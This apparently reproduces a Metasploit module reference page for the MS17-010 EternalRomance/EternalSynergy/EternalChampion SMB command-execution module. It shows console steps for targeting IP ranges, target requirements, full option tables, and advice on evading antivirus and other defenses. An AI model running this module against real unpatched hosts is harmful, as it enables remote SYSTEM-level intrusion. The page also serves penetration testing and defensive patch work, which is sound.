MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution - Metasploit
This page contains detailed information about how to use the auxiliary/admin/smb/ms17_010_command metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
Module: auxiliary/admin/smb/ms17_010_command
Source code: modules/auxiliary/admin/smb/ms17_010_command.rb
Disclosure date: 2017-03-14
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2017-0143, CVE-2017-0146, CVE-2017-0147
This module is also known as ETERNALSYNERGY, ETERNALROMANCE, ETERNALCHAMPION or ETERNALBLUE.
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(ms17_010_command) > show options
... show and set options ...
msf auxiliary(ms17_010_command) > set RHOSTS ip-range
msf auxiliary(ms17_010_command) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(ms17_010_command) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(ms17_010_command) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(ms17_010_command) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Introduction
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
- CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
- CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
Vulnerable Server
To be able to use auxiliary/admin/smb/ms17_010_command:
- You can OPTIONALLY use a valid username/password to bypass most of these requirements.
- The firewall must allow SMB traffic.
- The target must use SMBv1.
- The target must be missing the MS17-010 patch.
- The target must allow anonymous IPC$ and a Named Pipe.
You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
If you're having trouble configuring an anonymous named pipe, Microsoft's documentation on the topic may be helpful.
Verification Steps
At the minimum, you should be able use psexec to get a session with a valid credential using the following:
msf > use auxiliary/admin/smb/ms17_010_command
msf exploit(psexec) > set RHOSTS 192.168.1.80
RHOSTS => 192.168.1.80
msf exploit(psexec) > exploit
Options
By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
The NAMEDPIPE Option
By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
The LEAKATTEMPTS Option
Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
The DBGTRACE Option
Used to debug, gives extremely verbose information.
The SMBUser Option
This is a valid Windows username.
The SMBPass option
This can be either the plain text version or the Windows hash.
Scenarios
Automatic Target
There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
Powershell Target
The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
Native Upload Target
The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the SHARE datastore option), and then execute it with psexec.
This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
MOF Upload Target
The MOF target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting caught by antivirus on the target.
The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
Go back to menu.
Msfconsole Usage
Here is how the admin/smb/ms17_010_command auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > show info
Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
Module: auxiliary/admin/smb/ms17_010_command
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-03-14
Provided by:
sleepya
zerosum0x0
Shadow Brokers
Equation Group
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
WINPATH WINDOWS yes The name of the remote Windows directory
Description:
This module will exploit SMB with vulnerabilities in MS17-010 to
achieve a write-what-where primitive. This will then be used to
overwrite the connection session information with as an
Administrator session. From there, the normal psexec command
execution is done. Exploits a type confusion between Transaction and
WriteAndX requests and a race condition in Transaction requests, as
seen in the EternalRomance, EternalChampion, and EternalSynergy
exploits. This exploit chain is more reliable than the EternalBlue
exploit, but requires a named pipe.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://github.com/worawit/MS17-010
https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
Also known as:
ETERNALSYNERGY
ETERNALROMANCE
ETERNALCHAMPION
ETERNALBLUE
Module Options
This is a complete list of options available in the admin/smb/ms17_010_command auxiliary module:
msf6 auxiliary(admin/smb/ms17_010_command) > show options
Module options (auxiliary/admin/smb/ms17_010_command):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
WINPATH WINDOWS yes The name of the remote Windows directory
Advanced Options
Here is a complete list of advanced options supported by the admin/smb/ms17_010_command auxiliary module:
msf6 auxiliary(admin/smb/ms17_010_command) > show advanced
Module advanced options (auxiliary/admin/smb/ms17_010_command):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses
DELAY 0 yes Wait this many seconds before reading output and cleaning up
FILEPREFIX no Add a custom prefix to the temporary files
NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETRY 0 yes Retry this many times to check if the process is complete
SERVICE_PERSIST false yes Create an Auto run service and do not remove it.
SMB::AlwaysEncrypt true yes Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication
SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication
SMB::VerifySignature false yes Enforces client-side verification of server response signatures
SMBDirect true no The target port is a raw SMB service (not NetBIOS)
SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/smb/ms17_010_command module can do:
msf6 auxiliary(admin/smb/ms17_010_command) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/smb/ms17_010_command auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/smb/ms17_010_command) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
DCERPC::fake_bind_multi true no Use multi-context bind calls
DCERPC::fake_bind_multi_append 0 no Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend 0 no Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size 4096 yes Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio rw no Use a different delivery method for accessing named pipes (Accepted: rw, trans)
SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3)
SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads
SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads
SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes
SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13812 Merged Pull Request: Add a command target to the main PSexec module
- #13417 Merged Pull Request: SMBv3 integration with Framework
- #13540 Merged Pull Request: Change OptString of RPORT to OptPort
- #11873 Merged Pull Request: Add mixin to implement an exploit's check method by invoking a scanner
- #11523 Merged Pull Request: MSF5: Remove unneeded RHOST deregister in scanners
- #11215 Merged Pull Request: Fix messages /successfuly/successfully
- #11044 Merged Pull Request: Add authenticating... message
- #10570 Merged Pull Request: AKA Metadata Refactor
- #9881 Merged Pull Request: cleanup psexec code
- #9473 Merged Pull Request: MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules
References
- MS17-010
- CVE-2017-0143
- CVE-2017-0146
- CVE-2017-0147
- https://github.com/worawit/MS17-010
- https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
- https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
See Also
Check also the following modules related to this module:
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/ms17_010_eternalblue_win8
- exploit/windows/smb/ms17_010_psexec
- exploit/windows/smb/smb_doublepulsar_rce
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/admin/smb/check_dir_file
- auxiliary/admin/smb/delete_file
- auxiliary/admin/smb/download_file
- auxiliary/admin/smb/list_directory
- auxiliary/admin/smb/psexec_ntdsgrab
- auxiliary/admin/smb/samba_symlink_traversal
- auxiliary/admin/smb/upload_file
- auxiliary/admin/smb/webexec_command
- auxiliary/admin/scada/modicon_command
- auxiliary/admin/scada/multi_cip_command
- auxiliary/admin/scada/pcom_command
- auxiliary/admin/scada/phoenix_command
- auxiliary/scanner/http/jenkins_command
- auxiliary/admin/http/typo3_sa_2010_020
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/server/regsvr32_command_delivery_server
- exploit/windows/fileformat/office_ms17_11882
Related Nessus plugins:
- MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)
- MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
Authors
- sleepya
- zerosum0x0
- Shadow Brokers
- Equation Group
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.